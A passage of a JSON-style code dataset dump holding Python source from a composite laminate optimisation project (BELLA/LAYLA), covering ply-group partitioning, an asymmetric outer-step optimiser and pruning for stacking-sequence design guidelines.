ma.ceil(ma.floor(n_lam/2)/parameters.group_size_max)\r\n maxi = ma.floor(ma.floor(n_lam/2)/parameters.group_size_min)\r\n if mini > maxi:\r\n raise PartitioningError(\"\"\"\r\nPartitioning of the laminate not possible with the current group size\r\nlimitations !\r\n Try increasing the maximum number of plies per group or reducing the\r\n minimum number of plies per group.\"\"\")\r\n\r\n # The loop ensures that the division into groups is conformed to the\r\n # constraints on the group sizes, and groups of maximum size are\r\n # prefered\r\n for n_groups in np.arange(mini, maxi + 1):\r\n\r\n # ?\r\n missing = n_groups*parameters.group_size_max - ma.floor(n_lam/2)\r\n if missing > (parameters.group_size_max \\\r\n - parameters.group_size_min)*n_groups:\r\n continue\r\n\r\n #\r\n if n_groups == 0:\r\n continue\r\n\r\n # distribution of parameters.group_size_min plies in each group\r\n n_plies_in_groups = parameters.group_size_min * \\\r\n np.ones((n_groups,), int)\r\n\r\n # n_extra: number of remaining plies to be distributed in the groups\r\n n_extra = ma.floor(n_lam/2) \\\r\n - n_groups*parameters.group_size_min\r\n\r\n # n_full_groups: number of groups that can be totally filled by the\r\n # distribution of the remianing plies\r\n if n_extra >= parameters.group_size_max \\\r\n - parameters.group_size_min and n_extra != 0:\r\n n_full_groups = n_extra \\\r\n // (parameters.group_size_max-parameters.group_size_min)\r\n n_extra = n_extra \\\r\n % (parameters.group_size_max-parameters.group_size_min)\r\n else:\r\n n_full_groups = 0\r\n\r\n # filling of the n_full_groups\r\n n_plies_in_groups[n_groups - n_full_groups:] \\\r\n = parameters.group_size_max\r\n\r\n # distribution of the last remaining plies\r\n if n_extra != 0:\r\n n_plies_in_groups[n_groups - n_full_groups - 1] += n_extra\r\n\r\n # pos_first_ply_groups: position of the first ply of each group in\r\n # the order in which they appear in the stacking sequence\r\n pos_first_ply_groups = np.zeros((n_groups,), int)\r\n # pos_first_ply_groups[0] = 1\r\n for ind in np.arange(1, n_groups):\r\n pos_first_ply_groups[ind] \\\r\n = pos_first_ply_groups[ind - 1] + n_plies_in_groups[ind - 1]\r\n break\r\n\r\n # checking group sizes are correct (should not return an error!!!)\r\n if multipanel.thick_panel_has_middle_ply:\r\n if sum(n_plies_in_groups)*2 + 1 != n_lam:\r\n raise PartitioningError('Wrong partitioning!')\r\n elif sum(n_plies_in_groups)*2 != n_lam:\r\n raise PartitioningError('Wrong partitioning!')\r\n\r\n# if middle_ply != 0:\r\n# n_plies_in_groups[-1] += 1\r\n\r\n if n_groups > maxi:\r\n raise PartitioningError('''\r\nNo partition possible of the plies into groups of smaller size\r\nparameters.group_size_min and bigger size parameters.group_size_max.\r\nIncrease parameters.group_size_max or decrease parameters.group_size_min.\r\n''')\r\n\r\n else: # for non symmetric laminates\r\n\r\n # Evaluate the number of ply orientations for covering plies\r\n n_lam = multipanel.n_plies_max - 2*constraints.n_covering\r\n\r\n mini = ma.ceil(n_lam/parameters.group_size_max)\r\n maxi = ma.floor(n_lam/parameters.group_size_min)\r\n\r\n if mini > maxi:\r\n raise PartitioningError(\"\"\"\r\nPartitioning of the laminate not possible with the current group size\r\nlimitations !\r\n Try increasing the maximum number of plies per group or reducing the\r\n minimum number of plies per group.\"\"\")\r\n\r\n # iteration with increasing number of groups\r\n for n_groups in np.arange(mini, maxi + 1):\r\n # ?\r\n missing = n_groups * parameters.group_size_max \\\r\n - n_lam\r\n if missing > (parameters.group_size_max \\\r\n - parameters.group_size_min)*n_groups:\r\n continue\r\n\r\n #\r\n if n_groups == 0:\r\n continue\r\n\r\n # distribution of parameters.group_size_min plies in each group\r\n n_plies_in_groups = parameters.group_size_min \\\r\n * np.ones((n_groups,), int)\r\n\r\n # n_extra: number of remaining plies to be distributed in groups\r\n n_extra = n_lam - n_groups*parameters.group_size_min\r\n\r\n # n_full_groups: number of groups that can be totally filled by the\r\n # distribution of the remaining plies\r\n if n_extra >= parameters.group_size_max \\\r\n - parameters.group_size_min and n_extra != 0:\r\n n_full_groups = n_extra // (\r\n parameters.group_size_max - parameters.group_size_min)\r\n n_extra %= (\r\n parameters.group_size_max - parameters.group_size_min)\r\n else:\r\n n_full_groups = 0\r\n\r\n if n_full_groups > 0:\r\n n_plies_in_groups[-n_full_groups:] \\\r\n = parameters.group_size_max\r\n # Addition of the last other plies\r\n if n_extra != 0:\r\n n_plies_in_groups[-(n_full_groups + 1)] += n_extra\r\n\r\n # order_of_groups: group sizes in the order in which they\r\n # appear in the stacking sequence\r\n middle_point = ma.ceil(n_groups/2)\r\n order_of_groups = np.zeros((n_groups,), int)\r\n order_of_groups[:middle_point] \\\r\n = n_plies_in_groups[0:2*middle_point:2]\r\n order_of_groups[middle_point:] = np.flip(\r\n n_plies_in_groups[1:n_groups:2], axis=0)\r\n\r\n # pos_of_groups: position of the first ply of each\r\n # group in the order they appear in the final stacking sequence\r\n pos_of_groups = np.zeros((n_groups,), int)\r\n # pos_of_groups[0] = 1\r\n for ind in np.arange(1, n_groups):\r\n pos_of_groups[ind] = pos_of_groups[ind - 1] \\\r\n + order_of_groups[ind - 1]\r\n\r\n pos_first_ply_groups = np.ones((n_groups,), int)\r\n pos_first_ply_groups[0:2*middle_point:2] \\\r\n = pos_of_groups[:middle_point]\r\n pos_first_ply_groups[1:n_groups:2] = np.flip(\r\n pos_of_groups[middle_point:], axis=0)\r\n break\r\n\r\n # checking group sizes are correct (should not return an error!!!)\r\n if sum(n_plies_in_groups) != n_lam:\r\n raise PartitioningError('Wrong partitioning!')\r\n\r\n if n_groups > maxi:\r\n raise PartitioningError('''\r\nNo partition possible of the plies into groups of smaller size\r\nparameters.group_size_minand bigger size parameters.group_size_max.\r\nIncrease parameters.group_size_max or decrease parameters.group_size_min.\r\n''')\r\n\r\n# # correction for when middle ply not in largest laminate\r\n# if multipanel.has_middle_ply \\\r\n# and multipanel.reduced.panels[-1].middle_ply == 0:\r\n# n_plies_in_groups += 1\r\n\r\n # number of plies per group for thickest laminates\r\n multipanel.reduced.n_plies_per_group = n_plies_in_groups\r\n # position of the group first plies for thickest laminates\r\n multipanel.reduced.n_first_plies = pos_first_ply_groups\r\n # number of groups\r\n multipanel.reduced.n_groups = n_groups\r\n # percent_ of the laminate thickness associated to each group\r\n # for thickest laminatess\r\n percent_thickness = multipanel.reduced.n_plies_per_group \\\r\n / sum(multipanel.reduced.n_plies_per_group)\r\n# print('percent_thickness\\n', percent_thickness, '\\n')\r\n\r\n# print('multipanel.reduced.n_plies_per_group',\r\n# multipanel.reduced.n_plies_per_group)\r\n# print('multipanel.reduced.n_first_plies',\r\n# multipanel.reduced.n_first_plies)\r\n# print('multipanel.n_plies_max', multipanel.n_plies_max)\r\n\r\n #===================\r\n # Division of other panels into groups of plies\r\n #===================\r\n for ind_panel, panel in enumerate(multipanel.reduced.panels):\r\n # ----- if panel is one of the thickest panels ----- #\r\n if panel.n_plies == multipanel.n_plies_max:\r\n #--------------------------\r\n # number of plies per group\r\n #--------------------------\r\n panel.n_plies_per_group \\\r\n = multipanel.reduced.n_plies_per_group.astype(int)\r\n #--------------------------\r\n # position of the group first plies\r\n #--------------------------\r\n panel.n_first_plies = multipanel.reduced.n_first_plies\r\n #--------------------------\r\n # Number of ply drops number of ply drops for each group compared\r\n # to the groups thickest of the thickest laminate\r\n #--------------------------\r\n panel.n_ply_drops = np.zeros((multipanel.reduced.n_groups,))\r\n else: # ----- if panel is not one of the thickest panels ----- #\r\n #--------------------------\r\n # Distribution of the ply drops in the groups of the panel\r\n # from comparison with the thickest panel\r\n #--------------------------\r\n n_plies_panel = panel.n_plies\r\n if constraints.sym: # middle plies not included!\r\n if n_plies_panel % 2:\r\n n_plies_panel -= 1\r\n n_drops = (multipanel.n_plies_max - n_plies_panel)/2\r\n else:\r\n n_drops = multipanel.n_plies_max - n_plies_panel\r\n\r\n #print('n_plies', n_plies_panel, '\\n')\r\n\r\n #print('n_drops', n_drops, '\\n')\r\n #print('percent_thickness', percent_thickness)\r\n\r\n # attempt of a uniform distribution of ply drops\r\n n_ply_drops = np.floor(n_drops*percent_thickness).astype(float)\r\n\r\n# # correction for potential middle ply\r\n# if panel.middle_ply != 0:\r\n# if n_ply_drops[-1] > 0:\r\n# n_ply_drops[-1] -= 0.5\r\n# elif np.allclose(np.zeros((multipanel.reduced.n_groups,)),\r\n# n_ply_drops):\r\n# n_ply_drops[-1] = 0.5\r\n# else:\r\n# for index_group in range(\r\n# multipanel.reduced.n_groups -1)[::-1]:\r\n# if n_ply_drops[index_group] != 0:\r\n# n_ply_drops[index_group] -= 1\r\n# n_ply_drops[-1] = 0.5\r\n# break\r\n\r\n missing = int(n_drops - np.sum(n_ply_drops))\r\n #print('Ply drops per group:', n_ply_drops, '\\n')\r\n #print('missing ply drops:', missing, '\\n')\r\n # Addition of the missing ply drops\r\n iteration = 0\r\n while missing > 0:\r\n for index_group in range(multipanel.reduced.n_groups):\r\n if multipanel.reduced.n_plies_per_group[index_group] == \\\r\n parameters.group_size_max - iteration:\r\n n_ply_drops[index_group] += 1\r\n missing -= 1\r\n if missing == 0:\r\n break\r\n iteration += 1\r\n # Here, panel.n_ply_drops = chosen combination of ply drops\r\n panel.n_ply_drops = n_ply_drops\r\n #--------------------------\r\n # number of plies per group\r\n #--------------------------\r\n panel.n_plies_per_group = (multipanel.reduced.n_plies_per_group \\\r\n - panel.n_ply_drops).astype(int)\r\n #--------------------------\r\n # position of each group first ply\r\n #--------------------------\r\n if constraints.sym:\r\n n_first_plies = np.zeros(\r\n (multipanel.reduced.n_groups,), dtype=int)\r\n n_first_plies[0] = constraints.n_covering\r\n\r\n for jjj in range(1, multipanel.reduced.n_groups):\r\n n_first_plies[jjj] = n_first_plies[jjj - 1] \\\r\n + panel.n_plies_per_group[jjj - 1]\r\n panel.n_first_plies = n_first_plies\r\n #print(panel.n_plies_per_group)\r\n #print(n_first_plies)\r\n else:\r\n n_first_plies_b = np.zeros(\r\n (multipanel.reduced.n_groups,), dtype=int)\r\n n_first_plies = np.zeros(\r\n (multipanel.reduced.n_groups,), dtype=int)\r\n n_first_plies[0] = constraints.n_covering\r\n n_first_plies_b[0] = constraints.n_covering\r\n # order_of_groups: group sizes in the order\r\n # they appear in the final stacking sequence - in a column\r\n middle_point = ma.ceil(multipanel.reduced.n_groups/2)\r\n order_of_groups = np.zeros((multipanel.reduced.n_groups,), int)\r\n order_of_groups[:middle_point] = \\\r\n panel.n_plies_per_group[0:2*middle_point:2]\r\n order_of_groups[middle_point: ] = np.flip(\r\n panel.n_plies_per_group[1:multipanel.reduced.n_groups:2],\r\n axis=0)\r\n for index_group in np.arange(1, multipanel.reduced.n_groups):\r\n n_first_plies_b[index_group] \\\r\n = n_first_plies_b[index_group - 1] \\\r\n + order_of_groups[index_group-1]\r\n # Filling the start positions for each group in the table\r\n n_first_plies[0:2*middle_point:2] = \\\r\n n_first_plies_b[:middle_point]\r\n n_first_plies[1:multipanel.reduced.n_groups:2] \\\r\n = np.flip(n_first_plies_b[middle_point: ], axis=0)\r\n panel.n_first_plies = n_first_plies\r\n #print(panel.n_first_plies)\r\n\r\n\r\ndef forbidden_ply_counts(constraints, parameters):\r\n \"\"\"\r\n determines the ply counts that lead to an impossible partitioning of the\r\n plies into groups of allowed number of plies\r\n\r\n INPUTS\r\n\r\n - constraints.n_plies_min: minimum number of plies for a laminate\r\n - constraints.n_plies_max: maximum number of plies for a laminate\r\n - group_size_min: minimum number of plies for a group\r\n - group_size_max: maximum number of plies for a group\r\n - constraints.sym = True for symmetric laminates\r\n \"\"\"\r\n result = []\r\n for n_plies_test in range(constraints.n_plies_min,\r\n constraints.n_plies_max + 1):\r\n try:\r\n #===================\r\n # Division of the thickest panel into groups of plies\r\n #===================\r\n if constraints.sym:\r\n n_lam = n_plies_test - 2*constraints.n_covering\r\n mini = ma.ceil(ma.floor(n_lam/2)/parameters.group_size_max)\r\n maxi = ma.floor(ma.floor(n_lam/2)/parameters.group_size_min)\r\n if mini > maxi:\r\n raise PartitioningError(\"\"\"\r\nPartitioning of the laminate not possible with the current group size\r\nlimitations !\r\n Try increasing the maximum number of plies per group or reducing the\r\n minimum number of plies per group.\"\"\")\r\n else: # for non symmetric laminates\r\n n_lam = n_plies_test - 2*constraints.n_covering\r\n mini = ma.ceil(n_lam/parameters.group_size_max)\r\n maxi = ma.floor(n_lam/parameters.group_size_min)\r\n if mini > maxi:\r\n raise PartitioningError(\"\"\"\r\nPartitioning of the laminate not possible with the current group size\r\nlimitations !\r\n Try increasing the maximum number of plies per group or reducing the\r\n minimum number of plies per group.\"\"\")\r\n except PartitioningError:\r\n result.append(n_plies_test)\r\n else:\r\n pass\r\n return np.array(result)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n print('*** Test for the function divide_panels ***\\n')\r\n constraints = Constraints(n_covering=0, \r\n covering=False, \r\n sym=True)\r\n parameters = Parameters(constraints=constraints,\r\n group_size_max=10, \r\n group_size_min=6)\r\n n_plies_target1 = 81\r\n n_plies_target2 = 70\r\n n_plies_target3 = n_plies_target2\r\n n_plies_target4 = n_plies_target2\r\n panel_1 = Panel(ID=1,\r\n n_plies=n_plies_target1,\r\n constraints=constraints,\r\n neighbour_panels=[2])\r\n panel_2 = Panel(ID=2,\r\n n_plies=n_plies_target2,\r\n constraints=constraints,\r\n neighbour_panels=[1])\r\n panel_3 = Panel(ID=3,\r\n n_plies=n_plies_target3,\r\n constraints=constraints,\r\n neighbour_panels=[2])\r\n panel_4 = Panel(ID=4,\r\n n_plies=n_plies_target4,\r\n constraints=constraints,\r\n neighbour_panels=[2])\r\n multipanel = MultiPanel(panels=[panel_1, panel_2, panel_3, panel_4])\r\n multipanel.from_mp_to_blending_strip(constraints)\r\n \r\n print(f'Panel 1: {multipanel.reduced.panels[0].n_plies} plies')\r\n print(f'Panel 2: {multipanel.reduced.panels[1].n_plies} plies')\r\n# print(f'Panel 3: {multipanel.reduced.panels[2].n_plies} plies')\r\n divide_panels(multipanel, parameters, constraints)\r\n print('\\n')\r\n print(f'Panel 1: number of plies per groups = {multipanel.reduced.panels[0].n_plies_per_group}',\r\n sum(multipanel.reduced.panels[0].n_plies_per_group))\r\n print(f'Panel 2: number of plies per groups = {multipanel.reduced.panels[1].n_plies_per_group}',\r\n sum(multipanel.reduced.panels[1].n_plies_per_group))\r\n# print(f'Panel 3: number of plies per groups = {multipanel.reduced.panels[2].n_plies_per_group}',\r\n# sum(multipanel.reduced.panels[2].n_plies_per_group))\r\n print('\\n')\r\n print(f'Panel 1: number of ply drops per group = {multipanel.reduced.panels[0].n_ply_drops}')\r\n print(f'Panel 2: number of ply drops per group = {multipanel.reduced.panels[1].n_ply_drops}')\r\n# print(f'Panel 3: number of ply drops per group = {multipanel.reduced.panels[2].n_ply_drops}')\r\n print('\\n')\r\n print(f'Panel 1: position group first plies = {multipanel.reduced.panels[0].n_first_plies}')\r\n print(f'Panel 2: position group first plies = {multipanel.reduced.panels[1].n_first_plies}')\r\n# print(f'Panel 3: position group first plies = {multipanel.reduced.panels[2].n_first_plies}')\r\n\r\n print('\\n*** Test for the function forbidden_ply_counts ***\\n')\r\n constraints = Constraints(\r\n n_covering=1, \r\n covering=True, \r\n sym=True, \r\n n_plies_min=10, \r\n n_plies_max=100)\r\n parameters = Parameters(constraints, \r\n group_size_min=5, \r\n group_size_max=7)\r\n result = forbidden_ply_counts(constraints, parameters)\r\n print(f'Forbidden ply counts: {result}\\n')\r\n"
},
{
"alpha_fraction": 0.6078500151634216,
"alphanum_fraction": 0.6158172488212585,
"avg_line_length": 36.445945739746094,
"blob_id": "57f0ee0bdf678a8d46b0925cc9efcbe0875add9c",
"content_id": "324958358c1ab5b64f7818ecf0f715850000a002",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 8535,
"license_type": "permissive",
"max_line_length": 80,
"num_lines": 222,
"path": "/src/LAYLA_V02/outer_step_asym.py",
"repo_name": "noemiefedon/BELLA",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\ninner loop optimiser for asymmetric laminates\r\n\"\"\"\r\n__version__ = '2.0'\r\n__author__ = 'Noemie Fedon'\r\n\r\nimport sys\r\nimport random\r\nimport numpy as np\r\n\r\nsys.path.append(r'C:\\BELLA_and_LAYLA')\r\nfrom src.guidelines.ten_percent_rule import calc_penalty_10_pc\r\nfrom src.guidelines.balance import calc_penalty_bal\r\nfrom src.guidelines.ipo_oopo import calc_penalty_ipo_oopo_ss\r\nfrom src.LAYLA_V02.objectives import calc_obj_multi_ss\r\nfrom src.LAYLA_V02.objectives import objectives\r\nfrom src.LAYLA_V02.beam_search import beam_search\r\nfrom src.divers.pretty_print import print_lampam, print_ss, print_list_ss\r\n\r\ndef outer_step_asym(\r\n parameters,\r\n constraints,\r\n targets,\r\n lampam_assumed,\r\n lampam_weightings,\r\n n_plies_in_groups,\r\n levels_in_groups,\r\n n_groups,\r\n cummul_mom_areas,\r\n delta_lampams,\r\n mat_prop=None,\r\n not_constraints=None):\r\n '''\r\n performs an inner loop for asymmetric and unbalanced laminates\r\n\r\n OUTPUTS\r\n\r\n - outer_step_result: instance of the class OuterStepResults\r\n\r\n INPUTS\r\n\r\n - parameters: input parameters for the tuning of the algorithm\r\n - constraints: set of constraints\r\n - targets: target lamination parameters and ply counts\r\n - n_plies: total number of plies\r\n - cummul_mom_areas: cummulated ply moments of areas\r\n - delta_lampams: ply partial lamination parameters\r\n - lampam_assumed: the assumption of the remaining partial\r\n lamination parameters\r\n - lampam_weightings: lamination parameter weightings at each search level\r\n - levels_in_groups: indices of the plies for each ply group optimisation\r\n - n_groups: number of groups\r\n - mat_prop: material properties of the laminae\r\n - not_constraints: design guidelines that should not be satisfied\r\n '''\r\n outer_step_result = OuterStepResults()\r\n\r\n lampam_current = sum(lampam_assumed) # initial lamination parameters\r\n n_plies_per_angle = np.zeros(constraints.n_set_of_angles, float)\r\n ss_top = np.array([], dtype='int16')\r\n ss_bot = np.array([], dtype='int16')\r\n\r\n # details # do not consider\r\n if not_constraints is not None and not_constraints.rule_10_percent:\r\n random_for_10 = random.randint(0, 4)\r\n else:\r\n random_for_10 = None\r\n\r\n for inner_step in range(n_groups):\r\n\r\n# print('inner_step', inner_step)\r\n\r\n if inner_step < n_groups - 1: # not last ply group\r\n lampam_current -= lampam_assumed[inner_step]\r\n\r\n result = beam_search(\r\n levels=levels_in_groups[inner_step],\r\n lampam_current=lampam_current,\r\n lampam_weightings=lampam_weightings,\r\n group_size=n_plies_in_groups[inner_step],\r\n targets=targets,\r\n parameters=parameters,\r\n constraints=constraints,\r\n n_plies_per_angle=n_plies_per_angle,\r\n cummul_mom_areas=cummul_mom_areas,\r\n delta_lampams=delta_lampams,\r\n last_group=False,\r\n mat_prop=mat_prop,\r\n not_constraints=not_constraints,\r\n random_for_10=random_for_10,\r\n ss_top=ss_top,\r\n ss_bot=ss_bot)\r\n\r\n lampam_current = result.lampam_best\r\n n_plies_per_angle = result.ply_counts\r\n# outer_step_result.n_obj_func_calls += result.n_obj_func_calls\r\n\r\n ss_bot = np.hstack((ss_bot, result.ss_bot_best))\r\n ss_top = np.hstack((result.ss_top_best, ss_top))\r\n# print('result.ss_top_best', result.ss_top_best)\r\n# print('result.ss_bot_best', result.ss_bot_best)\r\n# print('ss_top', ss_top)\r\n# print('ss_bot', ss_bot)\r\n\r\n elif inner_step == n_groups - 1: # last ply group\r\n\r\n lampam_current -= lampam_assumed[inner_step]\r\n\r\n result = beam_search(\r\n levels=levels_in_groups[inner_step],\r\n lampam_current=lampam_current,\r\n lampam_weightings=lampam_weightings,\r\n group_size=n_plies_in_groups[inner_step],\r\n targets=targets,\r\n parameters=parameters,\r\n constraints=constraints,\r\n n_plies_per_angle=n_plies_per_angle,\r\n cummul_mom_areas=cummul_mom_areas,\r\n delta_lampams=delta_lampams,\r\n last_group=True,\r\n mat_prop=mat_prop,\r\n not_constraints=not_constraints,\r\n random_for_10=random_for_10,\r\n ss_top=ss_top,\r\n ss_bot=ss_bot)\r\n\r\n outer_step_result.lampam_best = result.lampam_best\r\n# outer_step_result.n_obj_func_calls += result.n_obj_func_calls\r\n outer_step_result.n_designs_last_level = result.n_designs_last_level\r\n outer_step_result.n_designs_repaired = result.n_designs_repaired\r\n outer_step_result.n_designs_repaired_unique \\\r\n = result.n_designs_repaired_unique\r\n outer_step_result.ss_best = result.ss_best\r\n\r\n obj_no_const = objectives(\r\n outer_step_result.lampam_best,\r\n targets=targets,\r\n lampam_weightings=lampam_weightings[-1],\r\n constraints=constraints,\r\n parameters=parameters,\r\n mat_prop=mat_prop)\r\n\r\n n_plies_per_angle = np.zeros((constraints.n_set_of_angles,), float)\r\n for ind in range(outer_step_result.ss_best.size):\r\n index = constraints.ind_angles_dict[outer_step_result.ss_best[ind]]\r\n n_plies_per_angle[index] += 1\r\n\r\n # calculation the penalties for the in-plane and out-of-plane\r\n # orthotropy requirements based on lamination parameters\r\n penalty_ipo_lampam, penalty_oopo = calc_penalty_ipo_oopo_ss(\r\n outer_step_result.lampam_best,\r\n constraints=constraints,\r\n parameters=parameters)\r\n# print('penalty_ipo_lampam', penalty_ipo_lampam)\r\n# print('penalty_oopo', penalty_oopo)\r\n\r\n # calculation the penalties for the in-plane orthotropy\r\n # requirements based on ply counts\r\n penalty_ipo_pc = 0\r\n if constraints.ipo and parameters.penalty_bal_switch:\r\n penalty_ipo_pc = calc_penalty_bal(\r\n n_plies_per_angle,\r\n constraints)\r\n# print('penalty_ipo_pc', penalty_ipo_pc)\r\n\r\n penalty_10 = 0\r\n if constraints.rule_10_percent:\r\n penalty_10 = calc_penalty_10_pc(n_plies_per_angle, constraints)\r\n\r\n penalty_bal_ipo = max(penalty_ipo_pc, penalty_ipo_lampam)\r\n\r\n# print('obj_no_const', obj_no_const)\r\n# print('penalty_10', penalty_10)\r\n# print('penalty_ipo_lampam', penalty_ipo_lampam)\r\n# print('penalty_ipo_pc', penalty_ipo_pc)\r\n# print('penalty_oopo', penalty_oopo)\r\n\r\n # calculation of the bounds\r\n outer_step_result.obj_const = calc_obj_multi_ss(\r\n objective=obj_no_const,\r\n penalty_10=penalty_10,\r\n penalty_bal_ipo=penalty_bal_ipo,\r\n penalty_oopo=penalty_oopo,\r\n coeff_10=parameters.coeff_10,\r\n coeff_bal_ipo=parameters.coeff_bal_ipo,\r\n coeff_oopo=parameters.coeff_oopo)\r\n\r\n # if repair failed\r\n if ((constraints.rule_10_percent and penalty_10)\\\r\n or (constraints.ipo and penalty_ipo_lampam \\\r\n and constraints.penalty_ipo_switch) \\\r\n or (constraints.ipo and penalty_ipo_pc \\\r\n and constraints.penalty_bal_switch)):\r\n outer_step_result.obj_const = 1e10\r\n\r\n# print('outer_step_result.ss_best', result.ss_best)\r\n# print('outer_step_result.lampam_best', outer_step_result.lampam_best)\r\n# print('outer_step_result.obj_const', outer_step_result.obj_const)\r\n\r\n return outer_step_result\r\n\r\nclass OuterStepResults():\r\n \" An object for storing the results of a outer step in LAYLA\"\r\n def __init__(self):\r\n \"Initialise the results of a outer step in LAYLA\"\r\n # solution stacking sequence\r\n self.ss_best = None\r\n # solution lamination parameters\r\n self.lampam_best = None\r\n # solution ply counts in each fibre direction\r\n self.ply_counts = None\r\n # solution constrained objective function\r\n self.obj_const = None\r\n# # number of objective function calls during outer step\r\n# self.n_obj_func_calls = 0\r\n # number of nodes at the last level of the search tree\r\n self.n_designs_last_level = 0\r\n # number of repaired nodes\r\n self.n_designs_repaired = 0\r\n # number of unique repaired nodes\r\n self.n_designs_repaired_unique = 0\r\n"
},
{
"alpha_fraction": 0.42608603835105896,
"alphanum_fraction": 0.4359056353569031,
"avg_line_length": 40.98624038696289,
"blob_id": "e0822178ef41c7c83b141b5353bc666ad908840a",
"content_id": "b55f88d37089b3e98915247c6837b13bb8d40d4e",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 9369,
"license_type": "permissive",
"max_line_length": 79,
"num_lines": 218,
"path": "/src/BELLA/pruning.py",
"repo_name": "noemiefedon/BELLA",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nPruning during guide laminate lay-up optimisation\r\n\"\"\"\r\n__version__ = '2.0'\r\n__author__ = 'Noemie Fedon'\r\n\r\nimport sys\r\nimport numpy as np\r\n\r\nsys.path.append(r'C:\\BELLA')\r\n#from src.divers.pretty_print import print_lampam, print_ss, print_list_ss\r\nfrom src.guidelines.external_contig import external_contig\r\nfrom src.guidelines.internal_contig import internal_contig2\r\nfrom src.guidelines.disorientation import is_diso\r\n\r\ndef pruning_diso_contig_damtol(\r\n child_ss,\r\n mother_ss_bot,\r\n level,\r\n n_plies_to_optimise,\r\n constraints,\r\n mother_ss_top=None,\r\n has_middle_ply=False):\r\n '''\r\n performs the pruning for disorientation, damage tolerance and contiguity\r\n design guidelines during ply orientation optimisation\r\n\r\n INPUTS:\r\n\r\n - child_ss: possible fibre orientations for the new ply\r\n - level: level in the beam search tree\r\n - constraints: set of design guidelines\r\n - n_plies_to_optimise: number of plies to optimise during BELLA step 2\r\n - mother_ss_bot: beginning of the partial lay-up of the ply group being\r\n optimised\r\n - mother_ss_bot: end of the partial lay-up of the ply group being optimised\r\n design\r\n - has_middle_ply: True if one panel at least has a middle ply\r\n '''\r\n # =========================================================================\r\n # pruning for middle ply symmetry\r\n # =========================================================================\r\n if constraints.sym and level == n_plies_to_optimise - 1 and has_middle_ply:\r\n child_ss = np.array([0, 90], int)\r\n\r\n # =========================================================================\r\n # pruning for damage tolerance\r\n # =========================================================================\r\n my_set = set([45, -45])\r\n\r\n if constraints.dam_tol:\r\n\r\n if level == 0:\r\n for ind in range(child_ss.size)[:: -1]:\r\n if child_ss[ind] not in my_set:\r\n child_ss = np.delete(child_ss, np.s_[ind], axis=0)\r\n if child_ss.size == 0:\r\n return None\r\n return child_ss\r\n\r\n elif not constraints.sym and level == n_plies_to_optimise - 1:\r\n for ind in range(child_ss.size)[:: -1]:\r\n if child_ss[ind] not in my_set:\r\n child_ss = np.delete(child_ss, np.s_[ind], axis=0)\r\n if child_ss.size == 0:\r\n return None\r\n return child_ss\r\n\r\n if constraints.dam_tol_rule in [2, 3]:\r\n\r\n if level == 1:\r\n\r\n if constraints.dam_tol_rule == 2:\r\n for ind in range(child_ss.size)[:: -1]:\r\n if child_ss[ind] != - mother_ss_bot[0]:\r\n child_ss = np.delete(child_ss, np.s_[ind], axis=0)\r\n\r\n elif constraints.dam_tol_rule == 3:\r\n for ind in range(child_ss.size)[:: -1]:\r\n if child_ss[ind] not in my_set:\r\n child_ss = np.delete(child_ss, np.s_[ind], axis=0)\r\n continue\r\n # diso\r\n if constraints.diso \\\r\n and not is_diso(-45, 45, constraints.delta_angle):\r\n if child_ss[ind] != - mother_ss_bot[0]:\r\n child_ss = np.delete(\r\n child_ss, np.s_[ind], axis=0)\r\n\r\n if child_ss.size == 0:\r\n return None\r\n return child_ss\r\n\r\n if level == n_plies_to_optimise - 2 and not constraints.sym:\r\n\r\n if constraints.dam_tol_rule == 2:\r\n for ind in range(child_ss.size)[:: -1]:\r\n if child_ss[ind] != - mother_ss_top[-1]:\r\n child_ss = np.delete(child_ss, np.s_[ind], axis=0)\r\n\r\n elif constraints.dam_tol_rule == 3:\r\n for ind in range(child_ss.size)[:: -1]:\r\n if child_ss[ind] not in my_set:\r\n child_ss = np.delete(child_ss, np.s_[ind], axis=0)\r\n continue\r\n # diso\r\n if constraints.diso \\\r\n and not is_diso(-45, 45, constraints.delta_angle):\r\n if child_ss[ind] != - mother_ss_top[-1]:\r\n child_ss = np.delete(\r\n child_ss, np.s_[ind], axis=0)\r\n\r\n if child_ss.size == 0:\r\n return None\r\n return child_ss\r\n\r\n # =========================================================================\r\n # pruning for disorientation\r\n # =========================================================================\r\n if constraints.diso:\r\n if constraints.sym or level % 2 == 0: # plies at bottom part\r\n # externally with mother_ss_bot\r\n if mother_ss_bot.size > 0:\r\n for ind in range(child_ss.size)[:: -1]:\r\n if not is_diso(child_ss[ind], mother_ss_bot[-1],\r\n constraints.delta_angle):\r\n child_ss = np.delete(child_ss, np.s_[ind], axis=0)\r\n\r\n else: # asymetric laminate top part\r\n # externally with mother_ss_top\r\n if mother_ss_top.size > 0:\r\n for ind in range(child_ss.size)[:: -1]:\r\n if not is_diso(child_ss[ind], mother_ss_top[0],\r\n constraints.delta_angle):\r\n child_ss = np.delete(child_ss, np.s_[ind], axis=0)\r\n\r\n if not constraints.sym and level == n_plies_to_optimise - 1:\r\n # last ply asymmetric laminates\r\n if level % 2 == 1: # top part\r\n for ind in range(child_ss.size)[:: -1]:\r\n if not is_diso(child_ss[ind], mother_ss_bot[-1],\r\n constraints.delta_angle):\r\n child_ss = np.delete(child_ss, np.s_[ind], axis=0)\r\n else: # bottom part\r\n for ind in range(child_ss.size)[:: -1]:\r\n if not is_diso(child_ss[ind], mother_ss_top[0],\r\n constraints.delta_angle):\r\n child_ss = np.delete(child_ss, np.s_[ind], axis=0)\r\n\r\n if child_ss.size == 0:\r\n return None\r\n # =========================================================================\r\n # pruning for the contiguity constraint\r\n # =========================================================================\r\n if constraints.contig:\r\n\r\n # not last ply\r\n if not level == n_plies_to_optimise - 1:\r\n\r\n # general case\r\n if constraints.sym or level % 2 == 0: # bottom ply\r\n\r\n for ind in range(child_ss.size)[:: -1]:\r\n # externally with mother_ss_bot\r\n test, _ = external_contig(\r\n angle=np.array((child_ss[ind],)),\r\n n_plies_group=1,\r\n constraints=constraints,\r\n ss_before=mother_ss_bot)\r\n if test.size == 0:\r\n child_ss = np.delete(child_ss, np.s_[ind], axis=0)\r\n continue\r\n\r\n\r\n # last ply\r\n else:\r\n\r\n # symmetric laminate with no middle ply\r\n if constraints.sym and not 